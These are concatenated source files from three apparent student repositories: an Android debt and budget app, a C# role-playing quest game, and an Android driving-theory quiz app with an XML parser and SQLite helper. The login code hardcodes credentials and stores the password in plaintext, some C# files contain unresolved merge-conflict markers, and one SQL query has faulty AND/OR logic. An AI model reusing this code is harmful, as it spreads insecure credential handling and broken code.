mMap.addPolyline(po1);
mMap.addPolyline(po2);
mMap.addPolyline(po3);
mMap.addPolyline(po4);
mMap.addPolyline(po5);
}
}
<file_sep>package com.example.ciller.pm;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
SharedPreferences shared = getSharedPreferences("login", Context.MODE_PRIVATE);
((EditText)findViewById(R.id.editTextMain1)).setText(shared.getString("username", ""));
((EditText)findViewById(R.id.editText2)).setText(shared.getString("password", ""));
}
protected void spreOperations(View v)
{
EditText user = (EditText)findViewById(R.id.editTextMain1);
EditText password = (EditText)findViewById(R.id.editText2);
if(user.getText().toString().equals("Ciller12") && password.getText().toString().equals("<PASSWORD>")) {
SharedPreferences sp = getSharedPreferences("login", Context.MODE_PRIVATE);
SharedPreferences.Editor editor = sp.edit();
editor.putString("username", user.getText().toString());
editor.putString("password", <PASSWORD>.getText().toString());
editor.commit();
Intent it = new Intent(getApplicationContext(), MenuOperations.class);
startActivity(it);
}
}
protected void metodaSignUp(View view)
{
Intent it = new Intent(getApplicationContext(),Register.class);
startActivity(it);
}
}
<file_sep>package com.example.ciller.pm;
import android.content.Intent;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
public class MenuOperations extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_menu_operations);
}
protected void spreLista(View v) {
Intent intent = new Intent(getApplicationContext(), AllDebtsList.class);
startActivity(intent);
}
protected void adaugaDatorie(View v)
{
Intent intent = new Intent(getApplicationContext(), DebtAddActivity.class);
startActivity(intent);
}
protected void spreBooks(View v)
{
Intent it = new Intent(getApplicationContext(), Books_WishList.class);
startActivity(it);
}
protected void spreReview(View v)
{
Intent it = new Intent(getApplicationContext(), Review.class);
startActivity(it);
}
protected void spreReceivables(View v)
{
Intent it = new Intent(getApplicationContext(), Receivables.class);
startActivity(it);
}
}
<file_sep># Android_BudgetManagementApp
Vezi documentatie pentru vizualizarea interfetei si a tuturor functionalitatilor produsului.
- Această aplicație a fost gândită inițial pentru a gestiona datoriile unei persoane față de diverse întreprinderi, prieteni, etc.
- Ulterior, am încercat să dezvolt aplicația și să gestionez si datoriile unor persoane față de utilizator, aceste sume înregistrându-se pe post de venituri.
- Mai mult, utilizatorul va beneficia și de o listă de dorințe care cumva îl va motiva să economisească bani pentru a-și permite obiectele pe care le dorește.
- Parsare fisiere JSON
- Prezinta si integrare cu Google Maps
- Baza de date : FIREBASE
<file_sep>package com.example.ciller.pm;
import java.io.Serializable;
/**
* Created by Ciller on 11/30/2017.
*/
public class DebtDetails {
private String name;
private String category;
private String amount;
private String unit;
private Integer createdDay;
private Integer createdMonth;
private Integer createdYear;
private Integer dueDay;
private Integer dueMonth;
private Integer dueYear;
private String payment;
private String description;
private boolean reminder;
public DebtDetails(String name, String category, String amount, String unit, Integer createdDay, Integer createdMonth, Integer createdYear, Integer dueDay, Integer dueMonth, Integer dueYear, String payment, String description, boolean reminder) {
this.name = name;
this.category = category;
this.amount = amount;
this.unit = unit;
this.createdDay = createdDay;
this.createdMonth = createdMonth;
this.createdYear = createdYear;
this.dueDay = dueDay;
this.dueMonth = dueMonth;
this.dueYear = dueYear;
this.payment = payment;
this.description = description;
this.reminder = reminder;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getCategory() {
return category;
}
public void setCategory(String category) {
this.category = category;
}
public String getAmount() {
return amount;
}
public void setAmount(String amount) {
this.amount = amount;
}
public String getUnit() {
return unit;
}
public void setUnit(String unit) {
this.unit = unit;
}
public Integer getCreatedDay() {
return createdDay;
}
public void setCreatedDay(Integer createdDay) {
this.createdDay = createdDay;
}
public Integer getCreatedMonth() {
return createdMonth;
}
public void setCreatedMonth(Integer createdMonth) {
this.createdMonth = createdMonth;
}
public Integer getCreatedYear() {
return createdYear;
}
public void setCreatedYear(Integer createdYear) {
this.createdYear = createdYear;
}
public Integer getDueDay() {
return dueDay;
}
public void setDueDay(Integer dueDay) {
this.dueDay = dueDay;
}
public Integer getDueMonth() {
return dueMonth;
}
public void setDueMonth(Integer dueMonth) {
this.dueMonth = dueMonth;
}
public Integer getDueYear() {
return dueYear;
}
public void setDueYear(Integer dueYear) {
this.dueYear = dueYear;
}
public String getPayment() {
return payment;
}
public void setPayment(String payment) {
this.payment = payment;
}
public String getDescription() {
return description;
}
public void setDescription(String description) {
this.description = description;
}
public boolean isReminder() {
return reminder;
}
public void setReminder(boolean reminder) {
this.reminder = reminder;
}
@Override
public String toString() {
return "DebtDetails{" +
"name='" + name + '\'' +
", category='" + category + '\'' +
", amount='" + amount + '\'' +
", unit='" + unit + '\'' +
", createdDay=" + createdDay +
", creayedMonth=" + createdMonth +
", createdYear=" + createdYear +
", dueDay=" + dueDay +
", dueMonth=" + dueMonth +
", dueYear=" + dueYear +
", payment='" + payment + '\'' +
", description='" + description + '\'' +
", reminder=" + reminder +
'}';
}
} | 231861873aa4921147f6ff1d5d281e2cf87edd2d | [
"Markdown",
"Java"
] | 8 | Java | CillerA/Android_BudgetManagementApp | 89d726f08e709f6fc2a07051ccc3e32a6a4a5f5f | 8b2f8e264cb974a442ccc319ab25562c8f7438f1 |
refs/heads/master | <repo_name>ilyuha1994/RoleGame<file_sep>/Квест/Квест/Globals.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;
namespace Квест
{
public class Globals
{
public static int Level=1;
<<<<<<< HEAD
public static int Points; //баллы
public static int Money;
public static int Ammo=10; //патроны
}
class resourse
{
public void func()
{
if (Globals.Points > 100)
{
Globals.Level += 1;
Globals.Points = 0;
}
if (Globals.Heal > 100)
{
Globals.Heal = 100;
}
if (Globals.Heal < 0)
Globals.Heal = 0;
}
}
public static class Gun
{
public static int PM=1;
public static int Beretta=1;
public static int Desert_Eagle = 1;
public static int AKS_74Y = 0;
public static int AK_105 = 0;
public static int AH_94 = 0;
public static int TOZ34 = 0;
public static int ShotGun = 0;
public static int Saiga_12 = 0;
public static int Dragunov_sniper_rifle = 0;
public static int Vintorez = 0;
public static int Gaus_Gun = 0;
}
public static class MedResource
{
public static int medicine = 3; // аптечка
public static int bandage = 0; // бинт
public static int analgesic = 0;//обезболивающее
public static int antidote = 0;
}
=======
public static int Heal=5;
public static int Medic=3; // кол-во аптечек
public static int Points=0; //баллы
public static int Money=0;
public static int Ammo=0; //патроны
public int[] param;
public void Save()
{
StreamWriter sw = new StreamWriter("Save.txt", false);
String st;
st = Globals.Level.ToString();
sw.WriteLine(st);
st = Globals.Heal.ToString();
sw.WriteLine(st);
st = Globals.Medic.ToString();
sw.WriteLine(st);
st = Globals.Points.ToString();
sw.WriteLine(st);
st = Globals.Money.ToString();
sw.WriteLine(st);
st = Globals.Ammo.ToString();
sw.WriteLine(st);
sw.Close();
}
public void Reader()
{
StreamReader read = new StreamReader("Save.txt");
read.ReadLine();
read.ReadLine();
}
}
>>>>>>> origin/master
}
<file_sep>/Квест/Квест/inventory.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace Квест
{
public partial class inventory : Form
{
public inventory()
{
InitializeComponent();
}
private void medicine_Click(object sender, EventArgs e)
{
<<<<<<< HEAD
LabelHeal.Text = Globals.Heal.ToString();
LabelLevel.Text = Globals.Level.ToString();
LabelMoney.Text = Globals.Money.ToString();
if (MedResource.medicine <= 0)
{
MessageBox.Show("Нет аптечек!");
}
else
{
Globals.Heal += 60;
MedResource.medicine -= 1;
}
=======
if (Globals.Medic > 0)
{
Globals.Medic--;
Globals.Heal += 50;
if (Globals.Heal > 100)
Globals.Heal = 100;
}
>>>>>>> origin/master
}
private void inventory_Load(object sender, EventArgs e)
{
LabelHeal.Text = Globals.Heal.ToString();
LabelLevel.Text = Globals.Level.ToString();
LabelMoney.Text = Globals.Money.ToString();
}
private void button1_Click(object sender, EventArgs e)
{
FormVillage form2 = new FormVillage();
this.Hide();
form2.ShowDialog();
this.Hide();
}
<<<<<<< HEAD
private void PDAButton_Click(object sender, EventArgs e)
{
PDA form3 = new PDA();
this.Hide();
form3.ShowDialog();
this.Show();
}
=======
>>>>>>> origin/master
}
}
<file_sep>/Квест/Квест/Village.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace Квест
{
public partial class FormVillage : Form
{
public FormVillage()
{
InitializeComponent();
}
private void PDAButton_Click(object sender, EventArgs e)
{
PDA form3 = new PDA();
this.Hide();
form3.ShowDialog();
this.Show();
}
private void InventoryButton_Click(object sender, EventArgs e)
{
inventory form2 = new inventory();
this.Hide();
form2.ShowDialog();
//this.Show();
}
private void LabelHeal_Click(object sender, EventArgs e)
{
}
private void FormVillage_Load(object sender, EventArgs e)
{
if (Globals.Points > 100)
{
Globals.Level += 1;
Globals.Points = 0;
}
LabelHeal.Text = Globals.Heal.ToString();
LabelLevel.Text = Globals.Level.ToString();
LabelMoney.Text = Globals.Money.ToString();
}
private void button1_Click(object sender, EventArgs e)
{
FormBatleDogs form2 = new FormBatleDogs();
this.Hide();
form2.ShowDialog();
this.Show();
}
private void SaveButton_Click(object sender, EventArgs e)
{
Globals s = new Globals();
s.Save();
}
}
}
<file_sep>/Квест/Квест/Form1.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace Квест
{
public partial class FormIntro : Form
{
public FormIntro()
{
InitializeComponent();
}
private void button1_Click(object sender, EventArgs e)
{
Globals read = new Globals();
read.Reader();
FormVillage form2 = new FormVillage();
this.Hide();
form2.ShowDialog();
this.Close();
}
private void label1_Click(object sender, EventArgs e)
{
}
private void FormIntro_Load(object sender, EventArgs e)
{
}
}
}
<file_sep>/Квест/Квест/FormLossDogs.cs
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace Квест
{
public partial class FormLossDogs : Form
{
public FormLossDogs()
{
InitializeComponent();
}
private void FormLossDogs_Load(object sender, EventArgs e)
{
if (Globals.Heal > 0)
label1.Text = "Собака вгрызлась Вам в плоть, но Вам удалось вырваться из ее когтей.";
else
label1.Text = "Вы погибли.";
}
}
} | 43d8f0f32d0644e797d977514f8ec21ed3a17754 | [
"C#"
] | 5 | C# | ilyuha1994/RoleGame | c25ba0e5037e916fffd79ebccbde3bd16d894db3 | ee1df2bbe52943fec5f63dfb83f0f29d57ffcc5e |
refs/heads/master | <repo_name>Shoaib3008757/XmlParsingTest<file_sep>/app/src/main/java/xmlparsingtest/ranglerz/com/xmlparsingtest/ReviewAnswers.java
package xmlparsingtest.ranglerz.com.xmlparsingtest;
import android.content.Intent;
import android.os.Bundle;
import android.support.design.widget.FloatingActionButton;
import android.support.design.widget.Snackbar;
import android.support.v7.app.AppCompatActivity;
import android.support.v7.widget.Toolbar;
import android.util.Log;
import android.view.View;
import android.view.ViewConfiguration;
import android.widget.AdapterView;
import android.widget.ListView;
import xmlparsingtest.ranglerz.com.xmlparsingtest.CustomAdapters.CustomAdapterReviewAnswers;
public class ReviewAnswers extends AppCompatActivity {
ListView reviewAnswers ;
CustomAdapterReviewAnswers customAdapterReviewAnswers;
UserChoiceTakeTest userChoiceTakeTest;
String userAnswerChoice = null;
String correctAnswer = null;
String correctImage = null;
String questionImage = null;
int questionNumber = 0;
public static final String TAG ="Review Answers";
public static final int SCROLLING_FACTOR = 32;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_review_answers);
userChoiceTakeTest = (UserChoiceTakeTest) getIntent().getSerializableExtra("object");
Log.d(TAG,"Total Correct Answer is "+userChoiceTakeTest.numberOfCorrectAnswers);
reviewAnswers = (ListView) findViewById(R.id.listViewReviewAnswers);
customAdapterReviewAnswers = new CustomAdapterReviewAnswers(getApplicationContext(),R.layout.single_item_listview,userChoiceTakeTest);
reviewAnswers.setAdapter(customAdapterReviewAnswers);
// make listview scroll to slow down
reviewAnswers.setFriction(ViewConfiguration.getScrollFriction() * SCROLLING_FACTOR);
reviewAnswers.setOnItemClickListener(new AdapterView.OnItemClickListener() {
@Override
public void onItemClick(AdapterView<?> parent, View view, int position, long id) {
correctAnswer = Splash.randomQuestions.get(position).getCorrectAnswer().toString().trim();
correctImage = Splash.randomQuestions.get(position).getCorrectImage().toString().trim();
questionImage = Splash.randomQuestions.get(position).getQuestionImage().toString().trim();
userAnswerChoice = userChoiceTakeTest.selectedAnswerText.get(position).toString().trim();
questionNumber = position +1;
Log.d(TAG," Correct Answer is "+correctAnswer+" User Answer is "+userAnswerChoice +"Question number is "+questionNumber);
// make a new activity to display the current question with user choice answer and also it's correct answer
Intent i = new Intent(ReviewAnswers.this,ShowAnswer.class);
i.putExtra("correctAnswer",correctAnswer);
i.putExtra("correctImage",correctImage);
i.putExtra("userAnswerChoice",userAnswerChoice);
i.putExtra("position",position);
i.putExtra("questionNumber",questionNumber);
i.putExtra("questionImage",questionImage);
startActivity(i);
}
});
}
}
<file_sep>/app/src/main/java/xmlparsingtest/ranglerz/com/xmlparsingtest/EntityClasses/Category.java
package xmlparsingtest.ranglerz.com.xmlparsingtest.EntityClasses;
import android.os.Parcel;
import android.os.Parcelable;
import java.io.Serializable;
/**
* Created by User-10 on 20-Oct-16.
*/
public class Category implements Serializable{
String name;
boolean isSelected;
int position;
public int getPosition() {
return position;
}
public void setPosition(int position) {
this.position = position;
}
public boolean isSelected() {
return isSelected;
}
public void setIsSelected(boolean isSelected) {
this.isSelected = isSelected;
}
public Category(String name , boolean value)
{
this.name = name ;
this.isSelected = value;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
}
<file_sep>/app/src/main/java/xmlparsingtest/ranglerz/com/xmlparsingtest/XmlHandler.java
package xmlparsingtest.ranglerz.com.xmlparsingtest;
import android.util.Log;
import android.widget.ListView;
import android.widget.Switch;
import org.xmlpull.v1.XmlPullParser;
import org.xmlpull.v1.XmlPullParserException;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import xmlparsingtest.ranglerz.com.xmlparsingtest.EntityClasses.Answer;
import xmlparsingtest.ranglerz.com.xmlparsingtest.EntityClasses.Question;
/**
* Created by User-10 on 01-Aug-16.
*/
public class XmlHandler {
// tags for xml
public QuestionAnswer ParseAndStoreXML(XmlPullParser xmlPullParser) throws XmlPullParserException {
int event = 0;
String text= null;
event = xmlPullParser.getEventType();
// TODO: booleans to check if the parser is in specific tag or not..
boolean inQuestionTag = false;
boolean inAnswerTag = false;
boolean isCorrectAnswer = false;
boolean inGraphicTag = false;
boolean inGraphicTagQuestion = false;
boolean inExplainationTag = false;
// this tag only found in caseStudy Files...
boolean inPartTag = false;
// object for store data
QuestionAnswer questionAnswer = null;
Answer answer = null;
Question question = null;
// get last inserted question id
long lastInsertedQuestionId = 0;
try{
while (event != XmlPullParser.END_DOCUMENT)
{
String name = xmlPullParser.getName();
// Log.d("tag","Name is "+name);
switch(event)
{
case XmlPullParser.START_DOCUMENT:
break;
case XmlPullParser.TEXT:
// Log.d("tag","Text Is called");
text = xmlPullParser.getText();
break;
case XmlPullParser.START_TAG:
if(name.equalsIgnoreCase("QF"))
{
// creates a new instance of the Class
// because a new Question is started
questionAnswer = new QuestionAnswer();
question = new Question();
Log.d("tag","Questions is Started");
question.setQuestionId(xmlPullParser.getAttributeValue(null,"id"));
question.setTopic(xmlPullParser.getAttributeValue(null,"topic"));
questionAnswer.category = xmlPullParser.getAttributeValue(null,"topic");
Log.d("tag","Category is "+question.getTopic());
}
else if(name.equalsIgnoreCase("question")) {
inQuestionTag = true;
}
else if(name.equalsIgnoreCase("explanation")) {
inExplainationTag = true;
// because we read the question text now we only want to read ExplanationText..
inQuestionTag = false;
}
else if(name.equalsIgnoreCase("part")) {
inExplainationTag = false;
// because we read the question text now we only want to read ExplanationText..
inQuestionTag = false;
inPartTag = true;
}
else if(name.equalsIgnoreCase("answer"))
{
answer = new Answer();
inAnswerTag = true;
String correctAnswer = xmlPullParser.getAttributeValue(null,"correct");
if(correctAnswer.equals("yes"))
{
isCorrectAnswer = true;
}
}
else if(name.equalsIgnoreCase("graphic"))
{
if(inQuestionTag)
inGraphicTagQuestion = true;
if(inAnswerTag)
inGraphicTag = true;
}
break;
case XmlPullParser.END_TAG:
if(name.equalsIgnoreCase("QF"))
{
// add object to the list
// questionAnswers.add(questionAnswer);
Log.d("tag","Questions is End");
// Log.d("tag","Size of List is "+questionAnswers.size());
}
else if(name.equalsIgnoreCase("explanation"))
{
inExplainationTag = false;
}
else if(name.equalsIgnoreCase("part"))
{
if(inPartTag)
{
question.setQuestionExplaination(text);
Log.d("tag","explaiantion text is"+text.toString().trim());
}
inPartTag = false;
}
else if(name.equals("text"))
{
if(inQuestionTag) {
String questionText = text;
question.setQuestionText(questionText);
questionAnswer.setQuestionText(questionText);
Log.d("tag", "Question is " + questionAnswer.getQuestionText());
}
if(inExplainationTag)
{
question.setQuestionExplaination(text);
Log.d("tag","explaiantion text is"+text.toString().trim());
}
if(inAnswerTag)
{
// to get the answer
String answerText = text;
answer.setAnswerText(answerText);
questionAnswer.setAnswerText(answerText);
Log.d("tag","Answer is "+questionAnswer.getAnswerText());
//
}
if(isCorrectAnswer)
{
// to get the correct answer
String correctAnswer = text;
// set the correct answer
answer.setCorrectAnswer(correctAnswer);
questionAnswer.setCorrectAnswer(correctAnswer);
Log.d("tag"," Correct Answer is "+questionAnswer.getCorrectAnswer());
}
}
else if(name.equalsIgnoreCase("question")) {
// add question object to list
inQuestionTag = false;
inGraphicTagQuestion = false;
Splash.questionList.add(question);
lastInsertedQuestionId = Splash.dbHelperClass.insertQuestions(question.getQuestionId(),question.getTopic(), question.getQuestionText(),0,question.getQuestionImage(),question.getQuestionExplaination());
}
else if(name.equalsIgnoreCase("graphic"))
{
if(inQuestionTag)
if(inGraphicTagQuestion)
{
if(text != null && !text.isEmpty()) {
Log.d("tag", "ParseAndStoreXML: In Question Graphic tag graphic name is " + text);
question.setQuestionImage(text);
}
}
if(inAnswerTag)
if(inGraphicTag)
{
Log.d("tag"," Is in Graphic tag ");
if(text != null && !text.isEmpty())
{
if(isCorrectAnswer)
{
answer.setCorrectImage(text);
}
answer.setImageName(text);
Log.d("tag", "Image is " + answer.getImageName());
}
}
// because we have multiple answer and multiple images..
inGraphicTag = false;
}
else if(name.equalsIgnoreCase("answer"))
{
inAnswerTag = false;
isCorrectAnswer = false;
Splash.answerList.add(answer);
Splash.dbHelperClass.insertAnswers(answer.getAnswerText(),answer.getCorrectAnswer(),question.getQuestionId(),answer.getImageName(),answer.getCorrectImage());
}
else if(name.equalsIgnoreCase("answers"))
{
// Log.d("tag","All Answers End");
}
break;
}
event = xmlPullParser.next();
}
} catch (XmlPullParserException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
return questionAnswer;
}
}
<file_sep>/app/src/main/assets/Incidents, Accidents and Emergencies/desktop.ini
[LocalizedFileNames]
AB2855.xml=@AB2855,0
<file_sep>/app/src/main/assets/Vehicle Handling/desktop.ini
[LocalizedFileNames]
BB1749.xml=@BB1749,0
<file_sep>/app/src/main/java/xmlparsingtest/ranglerz/com/xmlparsingtest/QuestionAnswer.java
package xmlparsingtest.ranglerz.com.xmlparsingtest;
/**
* Created by User-10 on 03-Oct-16.
*/
public class QuestionAnswer {
public String category;
public String questionText;
public String answerText;
public String correctAnswer;
public String getQuestionText() {
return questionText;
}
public void setQuestionText(String questionText) {
this.questionText = questionText;
}
public String getCategory() {
return category;
}
public void setCategory(String category) {
this.category = category;
}
public String getAnswerText() {
return answerText;
}
public void setAnswerText(String answerText) {
this.answerText = answerText;
}
public String getCorrectAnswer() {
return correctAnswer;
}
public void setCorrectAnswer(String correctAnswer) {
this.correctAnswer = correctAnswer;
}
}
<file_sep>/app/src/main/java/xmlparsingtest/ranglerz/com/xmlparsingtest/DBHelperClass.java
package xmlparsingtest.ranglerz.com.xmlparsingtest;
import android.content.ContentValues;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import android.util.Log;
import java.util.ArrayList;
import java.util.List;
import xmlparsingtest.ranglerz.com.xmlparsingtest.EntityClasses.Category;
/**
* Created by User-10 on 04-Oct-16.
*/
public class DBHelperClass extends SQLiteOpenHelper {
// Database Version change when the changes in Database
// Always change number when changes in database otherwise changes will not occur
public static final int DATABASE_VERSION = 44;
// Database Name
public static final String DATABASE_NAME = "abel.sqlite";
// table names
public static final String TABLE_USERS = "users";
public static final String TABLE_USER_TEST = "user_test"; // bridge table for many to many relationship
public static final String TABLE_TESTS = "tests";
public static final String TABLE_TEST_QUESTIONS = "test_question";
public static final String TABLE_QUESTIONS = "questions";
public static final String TABLE_ANSWERS = "answers";
public static final String TABLE_PROGRESS = "progress";
// User Table Columns names
public static final String U_ID = "uId";
public static final String U_NAME = "uName";
public static final String U_PASSWORD = "<PASSWORD>";
public static final String U_EMAIL = "uEmail";
public static final String U_CONTACT_NO = "uContactNo";
public static final String U_ADDRESS = "uAddress";
// User_test Table Columns names
public static final String U_T_ID = "id";
// Test Table Columns names
public static final String T_ID = "tId";
public static final String T_TYPE = "tType";
public static final String T_COMPLETE = "tComplete";
public static final String T_PASS = "tPass";
public static final String T_DATE = "tDate";
public static final String T_ISVISIBLE = "isVisible";
public static final String T_CORRECTANSWERS = "totalCorrectAnswers";
public static final String T_WRONANSWERS = "totalWrongAnswers";
// Test_question Table Columns names
public static final String T_Q_ID = "id";
// Questions Table Columns names
public static final String Q_ID = "qId";
public static final String Q_TOPIC = "qTopic";
public static final String Q_TEXT = "qText";
public static final String Q_FAVOURITE = "qFavourite";
public static final String Q_IMAGE = "qImage";
public static final String Q_EXPLANATIION = "qExplaination";
// Answers Table Columns names
public static final String A_ID = "aId";
public static final String A_TEXT = "aText";
public static final String CORRECT_ANSWER = "correctAnswer";
public static final String IMAGENAME = "imageName";
public static final String CORRECT_IMAGE = "correctImage";
// variables to store last inserted id for the row
long last_inserted_id_question;
long last_inserted_id_answer;
public DBHelperClass(Context context ) {
super(context, DATABASE_NAME, null, DATABASE_VERSION);
Log.d("tag", "Construtor call of db helper class");
}
@Override
public void onCreate(SQLiteDatabase db) {
Log.d("tag","on Create Call of DB HELPER CLASS");
db.execSQL("PRAGMA foreign_keys = ON;");
String CREATE_USERS_TABLE = "CREATE TABLE " + TABLE_USERS + "("
+ U_ID + " INTEGER PRIMARY KEY AUTOINCREMENT," + U_NAME + " TEXT," + U_PASSWORD + " TEXT," + U_EMAIL + " TEXT,"
+ U_CONTACT_NO + " INTEGER," + U_ADDRESS + " TEXT" + ")";
String CREATE_USERS_TEST_TABLE = "CREATE TABLE " + TABLE_USER_TEST + "("
+ U_T_ID + " INTEGER PRIMARY KEY AUTOINCREMENT," + U_ID + " INTEGER ," + T_ID + " INTEGER,"
+ " FOREIGN KEY (" + U_ID + ") REFERENCES " + TABLE_USERS + "(" + U_ID + "),"
+ " FOREIGN KEY (" + T_ID + ") REFERENCES " + TABLE_TESTS + "(" + T_ID + "))";
String CREATE_TESTS_TABLE = "CREATE TABLE " + TABLE_TESTS + "("
+ T_ID + " INTEGER PRIMARY KEY AUTOINCREMENT,"
+ T_TYPE + " TEXT,"
+ T_COMPLETE + " TEXT,"
+ T_PASS + " TEXT,"
+ T_DATE + " TEXT,"
+ T_ISVISIBLE + " TEXT,"
+ T_CORRECTANSWERS + " TEXT,"
+ T_WRONANSWERS + " TEXT )";
String CREATE_TEST_QUESTIONS_TABLE = "CREATE TABLE " + TABLE_TEST_QUESTIONS + "("
+ T_Q_ID + " INTEGER PRIMARY KEY AUTOINCREMENT," + T_ID + " INTEGER ," + Q_ID + " TEXT,"
+ " FOREIGN KEY (" + T_ID + ") REFERENCES " + TABLE_TESTS + "(" + T_ID + "),"
+ " FOREIGN KEY (" + Q_ID + ") REFERENCES " + TABLE_QUESTIONS + "(" + Q_ID + "))";
String CREATE_QUESTIONS_TABLE = "CREATE TABLE " + TABLE_QUESTIONS + "("
+ Q_ID + " TEXT PRIMARY KEY ,"
+ Q_TOPIC + " TEXT,"
+ Q_TEXT + " TEXT,"
+ Q_FAVOURITE + " TEXT,"
+ Q_IMAGE + " TEXT ,"
+ Q_EXPLANATIION + " TEXT"
+ ")";
String CREATE_ANSWERS_TABLE = "CREATE TABLE " + TABLE_ANSWERS + "("
+ A_ID + " INTEGER PRIMARY KEY AUTOINCREMENT," + A_TEXT + " TEXT NOT NULL ," + CORRECT_ANSWER + " TEXT," + Q_ID + " TEXT,"
+ IMAGENAME + " TEXT," + CORRECT_IMAGE + " TEXT,"
+ " FOREIGN KEY (" + Q_ID + ") REFERENCES " + TABLE_QUESTIONS + "(" + Q_ID + "))";
// here we execute the query for create tables
db.execSQL(CREATE_USERS_TABLE);
db.execSQL(CREATE_USERS_TEST_TABLE);
db.execSQL(CREATE_TESTS_TABLE);
db.execSQL(CREATE_TEST_QUESTIONS_TABLE);
db.execSQL(CREATE_QUESTIONS_TABLE);
db.execSQL(CREATE_ANSWERS_TABLE);
}
@Override
public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) {
Log.d("tag", "OnUpgrade Call");
// Drop older table if existed
db.execSQL("DROP TABLE IF EXISTS " + TABLE_USERS);
db.execSQL("DROP TABLE IF EXISTS " + TABLE_USER_TEST);
db.execSQL("DROP TABLE IF EXISTS " + TABLE_TESTS);
db.execSQL("DROP TABLE IF EXISTS " + TABLE_TEST_QUESTIONS);
db.execSQL("DROP TABLE IF EXISTS " + TABLE_QUESTIONS);
db.execSQL("DROP TABLE IF EXISTS " + TABLE_ANSWERS);
db.execSQL("DROP TABLE IF EXISTS " + TABLE_PROGRESS);
// Create tables again
onCreate(db);
}
// inserting data to db
public long insertQuestions(String questionId , String questionTopic, String questionText, int favourite,String imageName,String explanation) {
SQLiteDatabase db = getWritableDatabase();
ContentValues value = new ContentValues();
value.put(Q_ID, questionId);
value.put(Q_TOPIC, questionTopic);
value.put(Q_TEXT, questionText);
value.put(Q_FAVOURITE, favourite);
value.put(Q_IMAGE, imageName);
value.put(Q_EXPLANATIION, explanation);
last_inserted_id_question = db.insert(TABLE_QUESTIONS, null, value);
if (last_inserted_id_question == -1)
return last_inserted_id_question;
else
return last_inserted_id_question;
}
public boolean insertAnswers(String answerText, String correctAnswer, String questionId , String imageName, String correctImage) {
SQLiteDatabase db = getWritableDatabase();
ContentValues value = new ContentValues();
value.put(A_TEXT, answerText);
value.put(CORRECT_ANSWER, correctAnswer);
value.put(Q_ID, questionId);
value.put(IMAGENAME, imageName);
value.put(CORRECT_IMAGE, correctImage);
last_inserted_id_answer = db.insert(TABLE_ANSWERS, null, value);
if (last_inserted_id_answer == -1)
return false;
else
return true;
}
public boolean insertFavouriteQuestion(String questionId)
{
SQLiteDatabase db = getWritableDatabase();
ContentValues value = new ContentValues();
value.put(Q_FAVOURITE, 1);
int rowsUpdated = db.update(TABLE_QUESTIONS,value,"qId = ?",new String[]{ String.valueOf(questionId) });
Log.d("tag","rows Updated"+rowsUpdated);
if(rowsUpdated == 0)
return false;
else
return true;
}
public boolean insertTestRecord(String testType, String testComplete, String testPass , String testDate, String isVisible , String totalCorrectAnswers , String totalWrongAnswers) {
SQLiteDatabase db = getWritableDatabase();
ContentValues value = new ContentValues();
value.put(T_TYPE, testType);
value.put(T_COMPLETE, testComplete);
value.put(T_PASS, testPass);
value.put(T_DATE, testDate);
value.put(T_ISVISIBLE, isVisible);
value.put(T_CORRECTANSWERS, totalCorrectAnswers);
value.put(T_WRONANSWERS, totalWrongAnswers);
last_inserted_id_answer = db.insert(TABLE_TESTS, null, value);
if (last_inserted_id_answer == -1)
return false;
else
return true;
}
public Cursor getRandomQuestions()
{
SQLiteDatabase db = getReadableDatabase();
String MY_QUERY = "SELECT * FROM " + TABLE_QUESTIONS + " where qId NOT LIKE 'CS%' order by RANDOM() limit 50 ";
Cursor res = db.rawQuery(MY_QUERY, null);
// Log.d("tag","Size of Result Set is "+res.getCount());
return res;
}
public Cursor getRandomCategoryQuestions(String[] selectedCategories)
{
Log.d("Tag","List size is "+selectedCategories[0]);
SQLiteDatabase db = getReadableDatabase();
String query = "SELECT * FROM " + TABLE_QUESTIONS + " WHERE qId NOT LIKE 'CS%' and qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? " +
"OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? OR qTopic = ? " +
"ORDER BY RANDOM() LIMIT 50";
Cursor res = db.rawQuery(query, selectedCategories);
Log.d("tag","Size of Result Set is "+res.getCount());
return res;
}
public Cursor getLearningQuestionByCategory(String selectedCategories)
{
Log.d("Tag"," Category Selected is "+selectedCategories);
SQLiteDatabase db = getReadableDatabase();
Cursor res = db.query(TABLE_QUESTIONS, null, " qTopic = ? and qId NOT LIKE 'CS%' ", new String[]{selectedCategories}, null, null, null);
Log.d("tag","Size of Result Set is "+res.getCount());
return res;
}
// select the casestudy questions from database..
// caseStudy questions starts from CS
public Cursor getCaseStudyQuestionByCategory(String selectedCategories)
{
